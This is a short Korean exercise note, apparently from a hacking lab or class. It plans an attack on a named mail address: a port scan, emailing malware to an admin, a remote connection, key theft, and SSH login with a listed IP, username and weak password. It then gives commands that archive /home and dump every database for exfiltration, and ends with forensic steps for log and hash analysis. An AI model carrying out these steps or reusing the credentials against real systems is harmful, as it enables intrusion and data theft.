미션4
미션1,2,3 완료후 키인증 방식으로 변경
관리자가 생성한 키를 유출하여 접속하기
공격대상 : mater@mail.st.kr
공격순서
1)스캔 namp -v -p165535 st.kr
2)악성코드 메일로 보내기
3)해커와 연결
4)인증키 찾고 비밀번호 획득
5)외부접속
10.10.10.253 (ssh 125.246.95.253접속)
master
123456
웹페이지 전체 백업후 유출
cd /home
root로 tar cvzf home.tar.gz ./
sz home.tar.gz
데이터베이스 전체 백업후 유출
mysqldump -u root -p --all-databases > backup.sql
1)서버의 로그 기록 확보
>auth.log
2)RSYSLOG의 데이터 기록 전체 확보후 각자 분석
3)이메일 파일 확보후 분석
>이메일 로그에 본인의 ip가 있는가?
>각자 관리자한테 보낸 악성코드 어디에 있는지 찾기
>인코딩되어 있지만 디코딩후 해시값 분석 일치